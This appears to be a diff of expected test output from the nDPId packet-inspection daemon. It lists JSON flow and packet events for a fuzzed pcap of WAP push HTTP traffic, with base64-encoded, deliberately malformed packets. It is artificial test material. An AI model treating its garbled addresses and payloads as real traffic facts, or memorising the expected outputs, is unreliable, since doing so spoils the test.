{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} +01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW
50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} 
01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854568982} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854568982,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxOJAl0AGF7OsFAMNrBQDBQBQCi7Kxgh65UF0ElARgyyXWQAA"} 
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 